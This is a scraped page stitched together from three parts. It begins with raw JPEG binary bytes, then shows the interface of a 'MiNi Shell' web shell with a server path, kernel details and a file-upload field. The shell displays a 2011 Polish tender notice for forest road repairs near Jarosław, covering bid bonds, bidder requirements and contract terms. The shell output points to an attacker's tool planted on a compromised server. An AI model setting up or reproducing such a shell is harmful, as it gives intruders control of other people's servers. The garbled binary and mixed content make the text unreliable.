JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110602/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110602/140262-N-2011.html

<p class="kh_header"><b>Jarosław: Remont szlaków zrywkowo-wywozowych, przepustów, dróg oraz przebudowa dróg leśnych</b><br>
<b>Numer ogłoszenia: 140262 - 2011; data zamieszczenia: 02.06.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Państwowe Gospodarstwo Leśne Lasy Państwowe Nadleśnictwo Jarosław , Koniaczów 1L, 37-500 Jarosław, woj. podkarpackie, tel. 016 6281117, faks 016 6281097.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://start.lasy.gov.pl/web/jaroslaw</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Państwowa jednostka organizacyjna nie posiadająca osobowości prawnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Remont szlaków zrywkowo-wywozowych, przepustów, dróg oraz przebudowa dróg leśnych.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia opisano w załączniku I dla cześci od 1 do 7.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający, w stosunku do zamówień określonych w punkcie II.1.3 przewiduje możliwość udzielania zamówień uzupełniających, o których mowa w art. 67 ust. 1 pkt 6 ustawy Prawo zamówień publicznych (Dz. U. z 2010 r. Nr 113, poz. 759 z późn. zm.), w wysokości nie przekraczającej 50% wartości zamówienia podstawowego. Przedmiot zamówień uzupełniających bedzie tożsamy z zamówieniem podstawowym</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.42-6.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1. Oferta musi być zabezpieczona wadium w wysokości: 
Dla zadania częściowego nr 1: 1 400.00 PLN (słownie:  jeden tysiąc czterysta  00/100 PLN)
Dla zadania częściowego nr 2: 2 000.00 PLN (słownie:  dwa tysiące 00/100 PLN)
Dla zadania częściowego nr 3: 2 100.00 PLN (słownie:  dwa tysiące sto  00/100 PLN)
Dla zadania częściowego nr 4: 2 000.00 PLN (słownie:  dwa tysiące 00/100 PLN)
Dla zadania częściowego nr 5: 4 000.00 PLN (słownie:  cztery tysiące 00/100 PLN)
Dla zadania częściowego nr 6: 600.00 PLN (słownie:  sześćset  00/100 PLN)
Dla zadania częściowego nr 7: 6 000.00 PLN (słownie:  sześć tysięcy 00/100 PLN)
W przypadku gdy wykonawca składa ofertę na więcej niż jedną część (pakiet) winien wnieść wadium wedle łącznych wymagań dla poszczególnych części.
2. Wadium może być wnoszone w jednej lub kilku następujących formach:
a: pieniądzu: przelewem na rachunek bankowy Zamawiającego: Bank Gospodarki Żywnościowej o/Jarosław 10 20 30 0045 1110 0000 0077 5440;
b: poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym;
c: gwarancjach bankowych;
d: gwarancjach ubezpieczeniowych;
e: poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. Nr 109, poz. 1158, z późn. zm.).
3. Wadium wniesione w pieniądzu Zamawiający przechowuje na rachunku bankowym.
4. W przypadku składania przez Wykonawcę wadium w formie gwarancji, gwarancja musi być sporządzona zgodnie z obowiązującym prawem i musi zawierać następujące elementy:
a: nazwę dającego zlecenie (Wykonawcy), beneficjenta gwarancji (Zamawiającego), gwaranta (banku lub instytucji ubezpieczeniowej udzielającej gwarancji) oraz wskazanie ich siedzib;
b: określenie wierzytelności, która ma być zabezpieczona gwarancją;
c: kwotę gwarancji;
d: termin ważności gwarancji;
e: zobowiązanie gwaranta do: zapłacenia kwoty gwarancji na pierwsze pisemne żądanie Zamawiającego zawierające oświadczenie, iż Wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3 ustawy Prawo zamówień publicznych (Dz. U. z 2010 r. Nr 113, poz. 759, z późn. zm.), nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1 ustawy Prawo zamówień publicznych (Dz. U. z 2010 r. Nr 113, poz. 759, z późn. zm.) lub pełnomocnictw, i nie udowodnił, iż wynika to z przyczyn nieleżących po jego stronie;
f: zobowiązanie gwaranta do: zapłacenia kwoty gwarancji na pierwsze pisemne żądanie Zamawiającego zawierające oświadczenie, iż Wykonawca, którego ofertę wybrano:
- odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie;
- nie wniósł wymaganego zabezpieczenia należytego wykonania umowy;
- zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie Wykonawcy;
g: gwarancja winna być nieodwołalna i bezwarunkowa, gwarancja nie może w swej treści uzależniać wypłaty wadium od potwierdzenia przez bank, jakąkolwiek osobę  trzecią lub instytucję podpisów osób złożonych pod żądaniem wypłaty wadium w imieniu Zamawiającego. Wypłata kwoty wadium nie może być też uwarunkowana żadnymi innymi formalnościami koniecznymi do spełnienia ani dokumentami koniecznymi do złożenia wraz z żądaniem wypłaty wadium. Gwarancja winna przewidywać okres bezwarunkowej wypłaty maksymalnie do 14 dni od pierwszego pisemnego żądania wypłaty wadium;
h: wszelkie spory dotyczące gwarancji podlegają rozstrzygnięciu zgodnie z prawem Rzeczypospolitej Polskiej i podlegają kompetencji sądu właściwego dla siedziby Zamawiającego;
i: jednocześnie Zamawiający wymaga, aby okres ważności gwarancji nie był krótszy niż okres związania ofertą;
j: w przypadku wniesienia wadium przez Konsorcjum w formie gwarancji winno ono w swej treści zawierać wyraźne wskazanie wszystkich Wykonawców tworzących Konsorcjum wraz z podaniem ich nazw i siedzib.
5. Postanowienia punktu 9.4 stosuje się odpowiednio do poręczeń.
6. Wadium należy wnieść w terminie do dnia 2011-06-28 do godz. 10:00. Za termin wniesienia wadium w pieniądzu przelewem bankowym przyjmuje się termin uznania na rachunku bankowym Zamawiającego. Wniesienie wadium w formie innej niż pieniądz poprzez dołączenie go do oferty jest równoznaczne z wniesieniem go przed upływem terminu składania ofert, pod warunkiem złożenia oferty przed terminem składania ofert.
7. Wykonawca zobowiązany jest wnieść wadium na okres związania ofertą.
8. Zamawiający zwraca wadium wszystkim Wykonawcom niezwłocznie po wyborze oferty najkorzystniejszej lub unieważnieniu postępowania, z wyjątkiem Wykonawcy, którego oferta została wybrana jako najkorzystniejsza, z zastrzeżeniem art. 46 ust. 4a ustawy Prawo zamówień publicznych (Dz. U. z 2010 r. Nr 113, poz. 759, z późn. zm.).
9. Wykonawcy, którego oferta została wybrana jako najkorzystniejsza, Zamawiający zwraca wadium niezwłocznie po zawarciu umowy w sprawie zamówienia publicznego oraz wniesieniu zabezpieczenia należytego wykonania umowy, jeżeli jego wniesienia żądano.
10. Zamawiający zwraca niezwłocznie wadium, na wniosek Wykonawcy, który wycofał ofertę przed upływem terminu składania ofert.
11. Zamawiający żąda ponownego wniesienia wadium przez Wykonawcę, któremu zwrócono wadium na podstawie art. 46 ust. 1 ustawy Prawo zamówień publicznych (Dz. U. z 2010 r. Nr 113, poz. 759, z późn. zm.), jeżeli w wyniku rozstrzygnięcia odwołania jego oferta została wybrana jako najkorzystniejsza. Wykonawca wnosi wadium w terminie określonym przez Zamawiającego.
12. Jeżeli wadium wniesiono w pieniądzu, Zamawiający zwraca je wraz z odsetkami wynikającymi z umowy rachunku bankowego, na którym było ono przechowywane, pomniejszone o koszty prowadzenia rachunku bankowego oraz prowizji bankowej za przelew pieniędzy na rachunek bankowy wskazany przez Wykonawcę.
13. Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3 ustawy Prawo zamówień publicznych (Dz. U. z 2010 r. Nr 113, poz. 759, z późn. zm.), nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1 ustawy Prawo zamówień publicznych (Dz. U. z 2010 r. Nr 113, poz. 759, z późn. zm.), lub pełnomocnictw, chyba że udowodni, że wynika to z przyczyn nieleżących po jego stronie. 
14. Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca, którego oferta została wybrana:
a: odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie; 
b: nie wniósł wymaganego zabezpieczenia należytego wyko?nania umowy;
c: zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie wykonawcy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunki, dotyczące posiadania wiedzy i doświadczenia tj.: posiadają wiedzę i doświadczenie, polegające na wykonaniu przynajmniej jednej roboty budowlanej charakterem odpowiadającej przedmiotowi zamówienia co najmniej na wartość netto dla zadania: 
1 - 70 000,00 PLN;
2 - 100 000,00 PLN;
3 - 100 000,00 PLN;
4 - 100 000,00 PLN;
5 - 200 000,00 PLN;
6 - 30 000,00 PLN;
7 - 300 000,00 PLN;
w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie. W przypadku gdy wykonawca składa ofertę na więcej niż jedną część (pakiet) winien posiadać doświadczenie wedle łącznych wymagań dla poszczególnych części. Ocena spełniania warunków udziału w postępowaniu będzie dokonana na zasadzie spełnia/nie spełnia na podstawie oświadczenia wykonawcy oraz wykazu robót budowlanych potwierdzonego referencjami</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunki, dotyczące dysponowania odpowiednim potencjałem technicznym tj.: dysponują lub będą dysponować w trakcie realizacji zamówienia co najmniej następującymi narzędziami i urządzeniami technicznymi, dla zadania 1,2,4 - 7: 1 - koparka podsiębierna 3 szt., równiarka samojezdna 1 szt., walec statyczny samojezdny stalowy 1 szt., walec statyczny samojezdny ogumiony 1 szt, zagęszczarka wibracyjna 1 szt., samochód ciężarowy ładowności minimum 10 ton 4 szt., dla zadania 3 koparka podsiębierna 1 szt., zagęszczarka wibracyjna 1 szt., samochód ciężarowy ładowności minimum 10 ton 1 szt., remonter drogowy 1 szt. W przypadku gdy wykonawca składa ofertę na wszystkie części (pakiety) winien dysponować potencjałem technicznym wedle łącznych wymagań dla wszystkich części. Ocena spełniania warunków udziału w postępowaniu będzie dokonana na zasadzie spełnia/nie spełnia na podstawie oświadczenia wykonawcy oraz wykazu narzędzi, wyposażenia zakładu i urządzeń technicznych</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunki, dotyczące dysponowania osobami zdolnymi do wykonania zamówienia tj.: dysponują lub będą dysponować co najmniej dwoma osobami posiadającymi uprawnienia do kierowania robotami budowlanymi, operatorami koparek - 3 osoby, operatorami walców - 2 osoby, kierowcami posiadającymi prawo jazdy co najmniej kategorii C - 5 osób, operatorem równiarki - 1 osoba, pracownikami fizycznymi - 20 osób. Ocena spełniania warunków udziału w postępowaniu będzie dokonana na zasadzie spełnia/nie spełnia na podstawie oświadczenia wykonawcy</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunki, dotyczące sytuacji ekonomicznej i finansowej tj.: dysponują środkami finansowymi lub zdolność kredytową co najmniej na kwotę dla zadania:
1 - 70 000,00 PLN;
2 - 100 000,00 PLN;
3 - 100 000,00 PLN;
4 - 100 000,00 PLN;
5 - 200 000,00 PLN;
6 - 30 000,00 PLN;
7 - 300 000,00 PLN;
W przypadku gdy wykonawca składa ofertę na więcej niż jedną część (pakiet) winien dysponować środkami finansowymi lub zdolnością kredytową wedle łącznych wymagań dla poszczególnych części. Ocena spełniania warunków udziału w postępowaniu będzie dokonana na zasadzie spełnia/nie spełnia na podstawie informacji z banku lub kasy w której Wykonawca posiada rachunek</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Zamawiający przewiduje możliwość zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, w formie pisemnej pod rygorem nieważności, w następujących okolicznościach: 
a: potrzeby wprowadzenia zmian w dokumentacji projektowej lub specyfikacjach technicznych wykonania i odbioru robót budowlanych, będących podstawą realizacji przedmiotu umowy, wywołanej zmianami w przepisach prawa, normach i standardach, zmianami w wiedzy technicznej lub zmianą funkcji użytkowej, a także zmianami uwarunkowań środowiskowych, technicznych, technologicznych lub innymi okolicznościami;
b: potrzeby wprowadzenia zmian w miejscu i sposobie wykonania robót budowlanych, wynikających ze zmian technologicznych, osobowych, w organizacji spełnienia świadczenia, spowodowanych zmianami w przepisach prawa, norm i standardów lub zmianami w wiedzy technicznej, zmianami uwarunkowań środowiskowych lub innymi okolicznościami;
c: konieczności zmiany terminu realizacji spowodowanej: 
- wystąpieniem warunków atmosferycznych mających wpływ na brak możliwości lub utrudnienie wykonywania umowy, np. długotrwałe intensywne opady, powódź powodująca konieczność przerwania robót na czas niezbędny na osuszenie zalanego terenu do momentu, w którym możliwa jest kontynuacja lub rozpoczęcie robót, itp.;
- zmianami wynikającymi ze zmian przepisów prawa, norm, standardów, wiedzy technicznej, warunkami geologicznymi, terenowymi, archeologicznymi, wodnymi, ochrony środowiska, itp.;
- okolicznościami, których nie można było przewidzieć w chwili zawarcia umowy;
- okolicznościami leżącymi po stronie Zamawiającego;
- okolicznościami będącymi następstwem działania organów administracji i innych podmiotów trzecich, a także działania siły wyższej.
d: konieczności zmiany wynagrodzenia umownego, pod warunkiem, że wiąże się z ograniczeniem zakresu przedmiotu umowy wynikającej lub ze zmiany stawki podatku VAT;
e: przyczyn zewnętrznych niezależnych od Zamawiającego oraz wykonawcy skutkujących niemożliwością prowadzenia działań w celu wykonania umowy.
